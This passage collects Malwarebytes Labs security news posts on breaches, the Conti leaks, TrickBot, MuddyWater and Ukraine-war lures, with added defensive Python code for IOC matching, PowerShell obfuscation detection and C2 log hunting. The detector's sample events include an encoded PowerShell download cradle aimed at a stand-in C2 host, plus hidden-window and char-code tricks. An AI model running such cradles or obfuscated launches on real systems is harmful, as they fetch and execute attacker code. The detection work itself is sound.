IT NEWS

Data breaches leave customers very shaky, report says

Data breaches are among the most frequently reported cyberattacks against businesses of every size and industry. While they have exposed cybersecurity gaps on many fronts, some companies still do not prioritize closing them. Some scramble to become compliant, only to be breached weeks or months after getting certified.

Unsurprisingly, many current and potential customers respond negatively to companies that have been breached. This is evident in a global consumer survey conducted by the software company Axway.

For many, a breach is proof that a company is not doing what it is supposed to do with their data, which is to secure it at all costs, especially when that company is a prominent target for attackers. A company that says it takes the security of its customers "very seriously" after the fact looks like it is paying lip service rather than showing genuine concern for data security.

According to the survey, respondents are most confident that businesses in the financial (65 percent) and health (50 percent) sectors will protect their data. They are less confident entrusting their data to insurance companies (31 percent), educational institutions (31 percent), and retailers (26 percent).

When asked, “Would an online retailer’s lack of security for your private data prevent you from making a purchase through their website?”, 68 percent gave a resounding YES. This number is even higher—75 percent—when asked if they’d stop doing business with a company that has fallen victim to a breach or cyberattack that potentially compromised data. For companies with a history of cyberattacks or data breaches, 50 percent say they would not do any business with them.

While the numbers are stark and telling for any organization, only 12 percent of respondents said they would never engage with companies with such a history. It’s not completely bleak for breached companies though. It seems most survey takers—81 percent—would continue to use the brand provided that (a) the company has already addressed the issue that resulted in the breach or (b) consumers have done something on their end to help mitigate the problem, such as changing their login credentials.

“Security breaches and privacy concerns are another snag in the fabric that harms the frictionless experience people have come to expect,” said Brian Pagano, chief catalyst and VP at Axway. “In an increasingly connected world, we will continue to hear about security leaks. You can establish trust by giving consumers peace of mind about the back-end complexity thanks to secure solutions. And then, you can focus on the job of providing those brilliant new customer experiences.”

The post Data breaches leave customers very shaky, report says appeared first on Malwarebytes Labs.

The Conti ransomware leaks

On February 27, an individual with insight into the Conti ransomware group started leaking a treasure trove of data, beginning with internal chat messages. Conti is responsible for a number of high-profile attacks, including one against the Irish healthcare system that has cost more than $48 million and, more importantly, has had an unprecedented human impact.

Only shortly before, the Conti gang had announced its support for the Russian government despite international outrage over the invasion of and war on Ukraine. We believe this triggered a strong emotional reaction from either a threat actor or someone with unique access to Conti's infrastructure.

The Twitter handle @ContiLeaks has been posting extremely valuable data about Conti and its members. The tweets include screenshots, raw data files and even the ransomware source code. In between data dumps the actor — who is likely a Ukrainian national — is seen expressing his disgust and anger.


Due to the sheer volume of data and the fact that a large portion of chats are in Russian, it will take some time to process and analyze. What we know already is that there is extremely valuable information about the Conti ransomware group, in particular about how they work as an organization and how they target their victims.

While Conti is quite resourceful and will probably rebound, there is no doubt that these leaks will cost the group a great deal of money and may well instill fear of being identified as individuals.

The Malwarebytes Threat Intelligence team continues to track and analyze this data dump as well as other cyber threats related to the war in Ukraine. Any intelligence that is collected is passed on and used to protect our customers.

Indicators of Compromise

File name | Hash (SHA-256) | Description
1.tgz | 938cbbf9061792b6fc9bd2440b8a93f2db1139212f73e4fde30499568cbe75ea | Jabber chat logs
2.tgz | c4c5b77cceb82cd9b5f5e839136313e2fbfc97db731b162bc2e250d10fd62c1a | 2020 chat logs
Screenshot from 2021-12-15 21-26-28.png | 3460d66ff62bfccae55a26b499de0f18fc4b2d6efd2283b0278385269b047973 | Chat with victims
Screenshot from 2021-12-06 22-57-52.png | 8ac29ab81c98c1b094aa0986a0e66c7473d5b6b7153f7b34ae0e0215eb474e66 | Chat with victims
bazar_bots_domains_html.7z | e6f6fde7839a21807a321b79ac1395489c0eeea9b9187ba4d20c17559ccef608 | Bazar panel
bazar_bots_comments_html.7z | c0941c7c8d162d60f73d56aefe36647a31575a5077392202015f480453024a6b | Bazar panel
Screenshot from 2021-12-06 22-58-32.png | 84b8c65ba4cf18f852fd435fc9210f108b090dcd5cc69cf3beaaebff6b8cec2c | Chat interface
Screenshot from 2021-12-15 17-29-58.png | 0252a7441f7a2595add46aa89b4bf7d0b5e5a9eb4683550907b03c5917ece5bd | Cobalt Strike interface
Screenshot from 2021-12-15 17-31-08.png | fca83ce362e14648eb729547e14b06a7f402c98cce2c96a9ab47bf676755bd02 | Cobalt Strike interface
conti_locker_v2.zip | 4f0a7bf521f979afa947001eedd8b18a1ecd1994e1ae0ed90d65739de662684b | Encrypted archive with source code
bazar_bots.7z | 78d588aad48812f4421c22eeccee1a5b0499c41ae41e20ab6186982245719b86 |
backdoor.js.zip | ae21a4210486695dbdf514d96250a4e05f0e6e572f7eaad7048b3bdd357b4aad |
sendmail-master-0a343a19f4f48dd8efd6c052c092fd5feec916ad.zip | 5cddda3ccbf63faea37daf019437b760daa627632b986e1d764d11978944757a |
backdoor-master-3ad175864899c85021fa04cb24848a2bc66b1d16.zip | 2191fe7baba338a2b3f5a12a95ea4e42cad96850f2afd4a6c7eaa23289d610c5 |
import-master-ac16d180c391fce7a644f6c2a30fc3cfb37451f6.zip | 9de83968d33d896fc2a2629a271fbc9bcaf5bf504e033cfdb1fb99fd55953cde |
cadmin-master-b2675af7f27c05513f1fd8374ee7bc35a058f18f.zip | 041e879548c2839ebb36f642c5a25870ab1b015e875775077b7d8b951d53e0a1 |
admin-master-deb4694b0e9110ffcf84a42f70874a6e152c0b32.zip | ae6eef72bba38ab89c5cbe418d839b75b78a9247f06aa3e1df4850f103a6b1dd |
spoked-master-cf530950c30b81188d40c56b9a66e7d3bb21710c.zip | 1eaef39c48fcce2af0bf1ee089dd412d29d1396b31f0536138879cd0421d53ec |
storage_ebay_checker-master-599bede833e26b11db10fce55ee08ddd15280a6b.zip | 2a0f684bb99a9077914961bea16bac5f8baa5368a40a305a0ea0008a4c2f1bdf |
srw-master-df4b6eddf7fdd2e07fb75d0492deeeb2e15f959e.zip | c5bf64ac95cc82f65205984c8adb107870c71197c767744209bbc4a3e19aede8 |
storage_go-master-f4617f09d47a978d1128e0e1d77259900d62aac1.zip | f15cff9bf29f9098999401b16d73f61fe73789866e51319c7c24c4594ed7367d |
storage_ex-master-e4827b099abefd719fc674519ea0d2622ea304e0.zip | 6065d4b46266a2114dc8363b15ec7f884cbdbed1735f0ca4f1eb60df85d61a9b |
storage-master-3607d1f6a72e28efe84b55e8a660ff97db0e79a2.zip | f9e47d2cb8ba9a69c9ba8b2bc6017a1e54da68c944ee4324873047b0200546d0 |
185.25.51.173-20220226.json | 47d7d2027548f7562b221acdebe3b33d67ddd1dd278b98ad05a5f3ac14dea3fe |
185.25.51.173-20220227.json | c32f2ec819fee8581fbeed9b4eea40cb17efda7284beed5d12ed48e5af45c41c |
185.25.51.173-20220228.json | 234665c66de8541ef8e95cb9ccbcd5ecccb0189d3cf174c4e11a2c60dbc1742e |
FMvM2_PXsAMdOof.png | 1a34ba12130ffff45bb525cce48e5d19e4110e4a4bb06d79ad33d6a816f28927 |
FMvNB1mWUA4l4ud.png | 72c55f299c997ec0f5cb87e82141707482067609f1d631ac3cc825af90540b9f |
FMvNWvqWYAEZ298.png | a18aab0f358b7b8e23ebf6eb1252172625430e9aa461b3dcebff1de357113626 |
rocket-chat.tgz | b802f944cc6ba9b33c0d58c04295f9f6cf6473ffa602cfa447acb36a97afcc55 |
trickconti-forum.7z | d8aa49acc0b40f52b3ac3027ecc16ee053fd01e383272eca4d0637f24fd51a55 |
3.tgz | df75243be11b86b6644b671dcfd16fdeaf47a7b64e28bfd3ac179c44a6312b46 |
FMwnZodWYAE1vDX.png | d9e24d6bd5e118f04bc36fe3cfc314a808119d12190fd9b661b5f871c33fec6b |
trickbot-command-dispatcher-backend.tgz | 6b36a1d647d4de09e7f204f221b3445d499a540823c1c9b9612764e3241cdf62 |
trickbot-data-collector-backend.tgz | fad2f925ad2267c01d604e12081017215fa9e5ca83279064885bd7682400b761 |
FMw3KrXXEAUXAQJ.png | c1f5a70c2c5bb42ac973558c5c9ef510a2caab8aae19e4f1f68c76d1d10107b9 |
conti_locker.7z | ede451e9a65e55d0827e217a25cf895163c46bc42432f7cbed0f46d99769c385 |
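The table above is the raw, space-separated form in which such IOC lists are usually published, and file names with spaces make naive splitting fail. The following is an added example (editor's code, not part of the Malwarebytes post) that parses rows of that shape by anchoring on the 64-hex-character SHA-256 digest, drops the duplicated screenshot row, and matches files against the list by hash. The rows in IOC_TABLE are copied from the post; the file contents in SAMPLE_FILES are constructed so the demo runs offline, and one of them is added to the list under its own hash to show a hit.

```python
"""Parse the flattened 'File name / Hash / Description' IOC table and match
local files against it by SHA-256.

Added example, not Malwarebytes code. IOC_TABLE rows are copied from the post;
SAMPLE_FILES contents are constructed for the demo."""
import hashlib
import re
from typing import Dict, List, NamedTuple

# A SHA-256 digest is exactly 64 hex characters. Anchoring the row pattern on
# it lets file names that contain spaces ("Screenshot from 2021-12-15
# 21-26-28.png") parse correctly even though the table is space-separated.
_ROW = re.compile(
    r"^(?P<name>.+?)\s+(?P<sha256>[0-9a-fA-F]{64})(?:\s+(?P<desc>.*\S))?\s*$"
)


class Ioc(NamedTuple):
    file_name: str
    sha256: str
    description: str


def parse_ioc_table(text: str) -> List[Ioc]:
    """Parse rows of the form '<file name> <sha256> [<description>]'.

    Header and blank lines are skipped, and a hash listed twice (the post
    repeats one screenshot row) is kept once."""
    iocs: List[Ioc] = []
    seen = set()
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        digest = m.group("sha256").lower()
        if digest in seen:
            continue
        seen.add(digest)
        iocs.append(Ioc(m.group("name"), digest, m.group("desc") or ""))
    return iocs


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def match_files(files: Dict[str, bytes], iocs: List[Ioc]) -> Dict[str, Ioc]:
    """Return {path: IOC} for every file whose SHA-256 appears in the table."""
    by_hash = {ioc.sha256: ioc for ioc in iocs}
    hits: Dict[str, Ioc] = {}
    for path, data in files.items():
        ioc = by_hash.get(sha256_of(data))
        if ioc is not None:
            hits[path] = ioc
    return hits


# A subset of the post's table, including its duplicated screenshot row.
IOC_TABLE = """File name Hash Description
1.tgz 938cbbf9061792b6fc9bd2440b8a93f2db1139212f73e4fde30499568cbe75ea Jabber chat logs
Screenshot from 2021-12-15 21-26-28.png 3460d66ff62bfccae55a26b499de0f18fc4b2d6efd2283b0278385269b047973 Chat with victims
Screenshot from 2021-12-15 21-26-28.png 3460d66ff62bfccae55a26b499de0f18fc4b2d6efd2283b0278385269b047973 Chat with victims
conti_locker_v2.zip 4f0a7bf521f979afa947001eedd8b18a1ecd1994e1ae0ed90d65739de662684b Encrypted archive with source code
bazar_bots.7z 78d588aad48812f4421c22eeccee1a5b0499c41ae41e20ab6186982245719b86
"""

# Constructed file contents (not the real leak files). The first is added to
# the IOC list under its own hash in demo() so a match is produced offline.
SAMPLE_FILES = {
    "/srv/quarantine/conti_locker_v2.zip": b"constructed stand-in for the leaked archive",
    "/srv/quarantine/readme.txt": b"harmless file",
}


def demo() -> Dict[str, Ioc]:
    iocs = parse_ioc_table(IOC_TABLE)
    sample = SAMPLE_FILES["/srv/quarantine/conti_locker_v2.zip"]
    iocs.append(Ioc("conti_locker_v2.zip (constructed)", sha256_of(sample), "constructed"))
    return match_files(SAMPLE_FILES, iocs)


if __name__ == "__main__":
    for path, ioc in demo().items():
        print(f"HIT {path} -> {ioc.file_name}: {ioc.description}")
```

To use it against a real directory, replace SAMPLE_FILES with the bytes read from disk (or hash files in chunks for large archives) and feed the full table text to parse_ioc_table; note that only exact file hashes are matched, so a re-packed or re-encrypted copy of an archive will not hit.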

The post The Conti ransomware leaks appeared first on Malwarebytes Labs.

TrickBot takes down server infrastructure after months of inactivity

The king of tricks is dead. Long live the new king. Or will it make a comeback?

While we already assumed TrickBot was dead in the water, the shutdown of the server infrastructure on February 24, 2022, did not go unnoticed. Is this really the end of one of the most active botnets in the last decade?

History

The rise of TrickBot started when it was a banking Trojan designed to steal personal financial data. Initial development started in 2016, with many of its original features inspired by Dyreza which was another banking Trojan.

By 2018, thanks to its modular design and its ability to move laterally within a network, TrickBot had become the top-ranked threat for businesses. Back then the authors of TrickBot were agile and creative, regularly developing and rolling out new features. The separate modules made it easier to develop new capabilities and to use the malware for several purposes. For example, in 2019 researchers found a new TrickBot feature that allowed it to tamper with the web sessions of users on certain mobile carriers. Other features, such as disabling real-time monitoring by Windows Defender, were also added at some point.

In 2021, a number of arrests provided some insight into the scale and complexity of the TrickBot group. Those arrests also seem to have been one of the starting points that marked the end of the group: seeing co-workers indicted, some members may have felt insecure despite all the safeguards they had deployed to keep their true identities secret.

Cooperation

The ransomware scene can be compared to a legitimate business vertical in more than one way: you see short-lived cooperation, mergers, and staff moving from one company to another. Some malware distributors and ransomware gangs have established relationships that amount to being in league with each other. Given their nature and the amount of money that flows through these ransomware groups, they are sometimes referred to as (cyber)crime syndicates.

Over the years we have seen several campaigns in which Emotet acted as a dropper for the TrickBot trojan. TrickBot then stole the financial information it was after and downloaded the Ryuk ransomware. This Emotet-TrickBot-Ryuk chain was feared worldwide and turned out to be extremely resilient, and it did not change when Conti succeeded Ryuk. But Conti has grown over the years and expanded to the point where it can now be considered one of the major players in this "industry" in its own right.

Its relationship with TrickBot was one of the primary reasons for the rapid rise of Conti. At some point, Conti turned into the sole end-user of TrickBot’s botnet product. By the end of 2021, Conti had essentially acquired TrickBot, with multiple elite developers and managers making the move to join Conti.

The end(?)

There are a few contributing factors that indicate that this may really be the end of TrickBot.

  • The move of developers and managers to Conti, and possibly other gangs.
  • The high detection rate for TrickBot. A less actively developed malware becomes an easy target for detection and remediation routines.
  • The rise of BazarLoader, which used to be part of TrickBot's toolkit but has since been developed into a fully autonomous tool. It seems the likely candidate for Conti to develop further.
  • The voluntary shutdown of the servers and the fact that they hadn’t set up any new servers for months.
  • The lack of new TrickBot email spam campaigns in the year 2022.

Renowned researchers expect this to be the end of TrickBot as we know it.

That doesn’t mean it can’t rise like a Phoenix from the flames with a new label or under different management. Most of the people who have led and developed TrickBot throughout its long run will not simply disappear from the scene, but find new employers, like Conti.

Whether we will notice that TrickBot is gone remains to be seen. Plenty of new infiltration methods are available to the ransomware gangs and their affiliates. And it will probably even take years before we stop seeing TrickBot detections, dormant or not, on some system.

The post TrickBot takes down server infrastructure after months of inactivity appeared first on Malwarebytes Labs.

How Crisis Text Line crossed the line in the public’s mind: Lock and Code S03E05

Last month, Politico reported that Crisis Text Line, a national mental health support nonprofit whose volunteers help people through text-based chats, was sharing those chats with a for-profit company that Crisis Text Line spun-off in an attempt to boost funding for itself. That for-profit venture, called Loris.AI, received “anonymized” conversational data from Crisis Text Line, which Loris.AI would use to hone its product—a customer support tool.

The thinking behind this application of data went a little something like this: Companies all over the world have trouble dealing with difficult customer support conversations. Crisis Text Line had trained an entire volunteer force on having broadly difficult conversations. What if the lessons from those conversations could be gleaned from the data trails they left behind? What if the lessons could be taught to a product, which would in turn help customer support representatives deal with angry customers?

But that setup, once exposed by Politico, infuriated many members of the public. Some thought it was wrong to keep conversational data, period. Some thought it was wrong to allow outside researchers to study the data of texters and the volunteers who support them. And some were primarily upset with the application of this data to bolster a for-profit venture.

Today, to help us understand that anger and to dive into data privacy principles for crisis support services, we’re speaking with Courtney Brown, the former director of a suicide hotline network that was part of the broader National Suicide Prevention Lifeline.

Interestingly, during her time with her suicide hotline network, Brown consulted with Crisis Text Line on the evaluation of its volunteer training program in their first year.

For Brown, the problems with Crisis Text Line are clear: The use of the data was not proven to help anyone in any way that hadn’t already been discovered in prior suicide research.

“[Crisis Text Line is] acting like there is a social good, that there must be—there must be a social good somewhere in here. But seriously, what is it. Tell me what it is. Maybe I’ll reevaluate it if you can tell me how using this data is different from using all of the other data that’s been collected about suicide prevention.”

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs.


You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post How Crisis Text Line crossed the line in the public’s mind: Lock and Code S03E05 appeared first on Malwarebytes Labs.

Covid app’s privacy information ruled not clear enough

The UK’s data watchdog has issued a reprimand to both the Scottish government and NHS National Services Scotland about their Covid Status app. The Information Commissioner’s Office (ICO) urged both to act swiftly to address its concerns about the app that, according to the ICO, failed to provide people with clear details about how their personal information was being used.

Covid Status app

The NHS COVID Pass shows the holder’s Covid vaccination details, test results, and recovery information. The holder can use the app to prove their Covid status when travelling abroad or when visiting venues that require proof of a Covid status. The app can be used to display a QR code rather than details of the vaccination or test results, which can then be scanned by someone using a verifier app. They will need to see a green tick that confirms the person’s Covid status in order to allow them the requested access.

The displayed information is inherently personal, because it says something about your medical history, and so it should be treated with the greatest care. However, the ICO said there were only three days between its receiving full details of how the NHS Scotland Covid Status app would use people's information and the rollout of mandatory status checks. That did not give authorities and users enough time to review the privacy details.

Sharing information

Originally, there were plans to let the app share the images and passport details of Scottish users with the software company providing the facial recognition technology behind it, but this technology wasn’t necessary for the app to function and served no benefit to the user. The ICO concluded it would have been unlawful in these circumstances to share information with the software company in order to help them improve the facial recognition software.

As a result, the Scottish government and NHS National Services Scotland halted plans to share personal data with the software company. However, the ICO said the app was launched as planned without fully addressing its wider concerns about compliance with data protection law.

The investigation

The ICO followed up with an investigation and has now concluded that both parties initially failed to give users adequate information about how their personal information would be used, and did not correct this afterwards: they never provided privacy information concise enough for the average person to realistically understand how the app was using their data. The ICO decided to make its ruling public because of the significant public interest in the issues raised.

The defense

Ministers accepted that the privacy information could have been clearer, but the Scottish government said the NHS Scotland Covid Status app was an important tool in its response to COVID-19 and served a vital public health role during the pandemic. It went on to stress that at all times people's data was held securely and used appropriately.

“Together with NHS National Services Scotland, we will continue to work with the ICO to implement the improvements they have asked for, and ensure that lessons are learned for future work.”

Other Covid apps

Given the limited timeframe to come up with an acceptable solution and the sensitive data held, it was almost inevitable there would be flaws in some of the apps that were designed for this purpose. The NHS Scotland Covid app was not alone.

Numerous tracing applications have been developed or proposed, with official government support in some territories and jurisdictions. These apps are designed to notify users who have been in close contact with someone infected with COVID-19. Privacy concerns have been raised, especially about systems that track the geographical location of app users.

The Dutch CoronaMelder app was shut down for days because of privacy issues in the Google-provided layer of the app that potentially leaked data to standard apps on the Android platform. It was later criticized again because employees of the public health service (GGD) would be able to link app data to a specific patient.

Singapore's TraceTogether app, also a tracing app, had to update its privacy terms to reflect the fact that data from the app could be used in criminal investigations.

In France, a researcher found that the country's contact-tracing app collected more data than originally understood. His findings showed that all cross-contacts were sent to the central server, contrary to government guidance that only contacts lasting at least 15 minutes at less than one meter from a person who tested positive for COVID-19 would be stored. The app therefore processed more data than necessary or specified, and was not compliant with the data minimization principle. The French government has not denied the findings.

Stay safe, everyone!

The post Covid app’s privacy information ruled not clear enough appeared first on Malwarebytes Labs.

A week in security (February 21 – February 27)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (February 21 – February 27) appeared first on Malwarebytes Labs.

Google and Microsoft accused of feeding smaller search engines spam ads

Google and Microsoft appear to have been flooding their smaller search engine rivals with spam ads, to limit the number of higher-value ads that appear on them, according to data viewed by POLITICO.

Ads are considered “spam” if they appear in search results but have little to no relevance to the search terms a user has entered, and may direct users to less reputable sources. Such ads generate little value to search engines overall.

Pushing spammy ads to their smaller partners tilts the scales in favour of the bigger search engines in two ways. Firstly, it limits how much money smaller search engines can make, and gives Google and Microsoft a greater share of the more profitable ads. Secondly, users of alternative search engines like DuckDuckGo may be turned off by the poor ad choices when they search. This could encourage them to use Google and Bing instead, if they think those sites offer better and more reliable ads.

POLITICO reports that the findings come from data compiled by adtech researchers who wish to remain anonymous for fear of damaging their relationship with either Google or Bing.

Smaller search engines rely on the results of Google and Microsoft—so-called “gatekeeper search engines”—as they have the lion’s share of the search market. Google, of course, has by far the biggest share, with 90 percent, and up to 600 billion websites indexed. On the other hand, Bing has a 7 percent share but indexes more or less 150 billion web pages. POLITICO explains that these alternative search engines often have agreements with Google or Microsoft. This means that these two companies also supply the ads that appear on top of search result pages.

Readers may be surprised to discover that the privacy-focussed search engine DuckDuckGo uses Microsoft for its ads. According to DuckDuckGo “…your searches cannot be tied back to you”, however, that protection stops when you click on an ad: “When you leave our site, you are subject to other sites’ policies, including their data collection practices. For ads from Microsoft, you also pass through Microsoft Advertising’s platform.”

In its article, POLITICO compares the ads shown by DuckDuckGo and Bing for the search term "depression", with DuckDuckGo showing obviously lower-quality ads. Search ads are subject to all kinds of factors, so we thought we would try it ourselves. We saw the same result.

[Screenshot: DuckDuckGo ads for "depression"]
Microsoft ads for the search "depression" on DuckDuckGo
[Screenshot: Bing ads for "depression"]
Microsoft ads for the search "depression" on Bing

According to Marc-André Rousseau, a lawyer at the German law firm Schalast, the findings are in parallel with the Google Shopping saga as Google, once again, has conducted self-preferencing practices.

A spokesperson from Google told POLITICO that all ads signed up to search engine partners can appear on both Google’s and partner’s search results; however, the company “has certain algorithms in place that put controls on the types of ads shown.”

Alternative search engines have reacted differently to the findings. DuckDuckGo said that it is "constantly working to improve the quality of its results." Qwant, a search engine that relies on Microsoft's index, has started to study the advertising area in more detail in recent months. Startpage, a privacy search engine like Qwant, acknowledges using the Google ad network and argues that the low-quality ads are the result of less user tracking. POLITICO, however, rejects that explanation: in its experiment the same ads appeared on new machines that had never used Bing or Google.

The post Google and Microsoft accused of feeding smaller search engines spam ads appeared first on Malwarebytes Labs.

CISA warns of cyberespionage by Iranian APT “MuddyWater”

Cybersecurity agencies in the US and UK have issued a joint cybersecurity advisory (CSA) on MuddyWater, a government-sponsored Iranian advanced persistent threat (APT) actor. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the US Cyber Command Cyber National Mission Force (CNMF), and the National Security Agency (NSA), together with the UK’s National Cyber Security Centre (NCSC), have detailed operations by this APT against a range of governments and private organizations around the world.

MuddyWater, also known as Earth Vetala, MERCURY, Seedworm, Static Kitten, and TEMP.Zagros, targets the telecommunications, defense, local government, and oil and natural gas sectors, among others, in Africa, Asia, Europe, and North America.

“MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS),” the advisory briefs its readers. “This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.”

“MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions.”
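The advisory's description of obfuscated PowerShell hiding C2 functions is a detection opportunity in process-creation telemetry. The following is an added example (editor's code, not from the advisory or from Malwarebytes) that decodes -EncodedCommand payloads and scores launches against a small set of obfuscation and downloader indicators. The indicator list, the scoring rule and the sample events are the editor's assumptions; real MuddyWater command lines will differ.

```python
"""Flag obfuscated PowerShell launches of the kind the advisory describes, run
over constructed process-creation events.

Added example, not from the advisory or Malwarebytes. The indicator list, the
scoring rule and the sample events are the author's assumptions."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Signs of an obfuscated or downloader-style launch. Each is weak on its own;
# the verdict below needs an encoded command plus one, or two of them together.
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)invoke-expression|\biex\b"),
    "web-download": re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "backtick-in-token": re.compile(r"[A-Za-z]`[A-Za-z]"),
    "char-code-join": re.compile(r"(?i)\[char\]\s*\d+|-join\b"),
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the argument of -EncodedCommand, or None.

    powershell.exe accepts any unambiguous prefix of the parameter name, so
    -e, -ec, -enc and -EncodedCommand all have to be recognised."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/"):
            name = tok[1:].lower()
            if name and "encodedcommand".startswith(name):
                return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str) -> str:
    """The encoded payload is UTF-16LE text; pad in case the log dropped '='."""
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used only to build the sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode any encoded command and score the launch against INDICATORS."""
    b64 = extract_encoded_command(cmdline)
    script = ""
    if b64 is not None:
        try:
            script = decode_encoded_command(b64)
        except (ValueError, UnicodeDecodeError):
            script = ""
    # Drop the base64 blob before matching so patterns never fire on random-
    # looking base64 text; the decoded script is matched in its place.
    visible = cmdline.replace(b64, "") if b64 else cmdline
    text = visible + "\n" + script
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    suspicious = (b64 is not None and len(hits) >= 1) or len(hits) >= 2
    return {"encoded": b64 is not None, "decoded": script,
            "indicators": hits, "suspicious": suspicious}


def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, Dict[str, object]]]:
    """Return (host, verdict) for every event judged suspicious."""
    out = []
    for host, cmd in events:
        verdict = analyze(cmd)
        if verdict["suspicious"]:
            out.append((host, verdict))
    return out


# Constructed events (host, command line). The first hides a download cradle
# in an encoded command; the third builds "iex" from character codes; the
# second is a routine, unencoded script launch that must not be flagged.
C2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
SAMPLE_EVENTS = [
    ("ws01", "powershell.exe -nop -w hidden -enc " + encode_command(C2_SCRIPT)),
    ("ws02", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ("ws03", "powershell.exe -w hidden -c \"$s=[char]105+[char]101+[char]120; & $s (gc C:\\Users\\Public\\x.txt)\""),
]

if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_EVENTS):
        print(host, verdict["indicators"])
```

The decoded script is what you want in the alert, not the base64 blob: it is what an analyst reads and what later indicator searches (URLs, hosts) run over. Pair this with Script Block Logging where it is enabled, which records the de-obfuscated code PowerShell actually executes and catches layers of obfuscation this command-line view cannot.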

The full advisory can be read on CISA's website and downloaded as a PDF.

The advisory lastly reminds readers to take mitigating steps to protect themselves from malicious MuddyWater campaigns. Ensure that software is patched, prioritizing applications and operating systems with known, exploitable vulnerabilities. Back it up with an effective antivirus solution, EDR and SIEM. Use multifactor authentication (MFA) wherever you can. Limit access to resources according to the principle of least privilege.

Lastly, ensure that employees are trained to be alert for suspicious emails or social media posts, which could be the start of a phishing attack.

The post CISA warns of cyberespionage by Iranian APT “MuddyWater” appeared first on Malwarebytes Labs.

Cyber lures and threats in the context of the war in Ukraine

The conflict between Ukraine and Russia goes a long way back, but it took a dramatic turn after the 2014 Ukrainian revolution. Since then, the war in the Donbas region has resulted in a number of casualties as well as a constant feeling of insecurity among the population.

In recent months, Russia increased its pressure on Ukraine by placing more and more troops along its Eastern border. At the same time, a number of destructive cyber attacks against government websites and other organizations took place.

On February 24, Russia invaded Ukraine and started a full military conflict across that nation. While the kinetic war is by far the most pressing issue, cyber threats against Ukraine and Western countries are increasing as well.

In this blog, we will review some of the threats that have primarily targeted Ukraine but could also spill over globally.

Constant APT attacks

The Russian APT group Gamaredon has been actively targeting Ukraine for a number of years, but in recent months its interest has reached a new level, observed in campaigns that use a variety of lures. We recently caught one such sample, which displays a 40-page decoy PDF supposedly detailing Russian military training:

(Translated from the Russian decoy text:) The Manual on Physical Training in the Armed Forces of the Russian Federation is intended for commanders (chiefs) at all levels and for physical training specialists, and contains instructions and requirements on the physical training of personnel.

The malicious archive contains not only the decoy but also a VNC server that gives the attacker access to the victim's computer. The command and control server (licensecheckout[.]com) is hosted on 45.139.186[.]190 (Russia).
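A practical trap with indicators printed as above is that they are defanged: pasting licensecheckout[.]com into a log search will never match real traffic. The following is an added example (editor's code, not part of the Malwarebytes post) that refangs the two indicators, then hunts for them in DNS and proxy records, matching subdomains of the C2 domain but not look-alike domains that merely contain it. The log lines and their key=value format are constructed for the demo.

```python
"""Hunt for the Gamaredon C2 indicators quoted in the post in DNS and proxy
logs. Added example, not from the post: the indicators are the post's, printed
defanged; the log lines and their key=value format are constructed."""
import ipaddress
import re
from typing import List, Set, Tuple

_DEFANG = re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]|\(dot\)", re.IGNORECASE)


def refang(ioc: str) -> str:
    """example[.]com -> example.com, hxxp:// -> http://, 1[.]2[.]3[.]4 -> 1.2.3.4"""
    s = _DEFANG.sub(".", ioc.strip().lower())
    return re.sub(r"^hxxp", "http", s)


def classify(iocs: List[str]) -> Tuple[Set[str], Set[str]]:
    """Split refanged indicators into domain names and IP addresses."""
    domains: Set[str] = set()
    ips: Set[str] = set()
    for raw in iocs:
        value = refang(raw)
        try:
            ips.add(str(ipaddress.ip_address(value)))
        except ValueError:
            domains.add(value.rstrip("."))
    return domains, ips


def domain_matches(qname: str, domains: Set[str]) -> bool:
    """Match the domain itself and its subdomains, but not look-alikes that
    merely contain it (licensecheckout.com.evil.test must not match)."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def parse_event(line: str) -> dict:
    """Constructed format: '<timestamp> <source> key=value key=value ...'."""
    ts, source, rest = line.split(" ", 2)
    fields = dict(re.findall(r"(\w+)=(\S+)", rest))
    fields.update(ts=ts, source=source)
    return fields


def hunt(lines: List[str], iocs: List[str]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, client, matched value) for every hit."""
    domains, ips = classify(iocs)
    hits = []
    for line in lines:
        ev = parse_event(line)
        qname = ev.get("qname", "")
        if qname and domain_matches(qname, domains):
            hits.append((ev["ts"], ev["client"], qname.rstrip(".")))
            continue
        dst = ev.get("dst", "")
        host = dst.rsplit(":", 1)[0] if dst else ""  # strip the port; IPv4 only here
        if host in ips:
            hits.append((ev["ts"], ev["client"], host))
    return hits


# Indicators as printed in the post (defanged).
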